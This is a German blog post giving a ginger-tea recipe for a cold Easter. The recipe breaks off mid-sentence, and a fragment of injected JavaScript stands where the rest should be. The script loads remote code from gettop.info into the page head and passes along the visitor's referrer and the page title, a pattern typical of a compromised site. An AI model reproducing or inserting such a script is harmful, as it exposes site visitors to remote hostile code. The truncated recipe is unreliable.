Ingwertee zum kalten Osterfest

Da wir ja noch immer unter dem wohl seit langem längsten winter zu leiden haben, möchte ich euch heute ein wirklich leckeres Rezept für kalte Tage vorstellen. wir waren im Riesengebirge und dort trinkt man den Tee in jeder Baude.

Man nehme also ein großes Glas, welches heiße Getränke aushält (z. B,: Kaffeeglas) dahinein kommen:

– drei Scheiben ungespritzte Orange in kleine Stücke geschnitten, den Saft, der sich bildet gibt man mit hinein
– 1 Teel. Granbarrys
– 1 Teel. Honig (je nach Geschmack auch etwas mehr)

Das wird a
d.getElementsByTagName(‘head’)[0].appendChild(s);s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”; d.getElementsByTagName(‘head’)[0].appendChild(s);

Posted in Blog, Tee.

Hinterlasse eine Antwort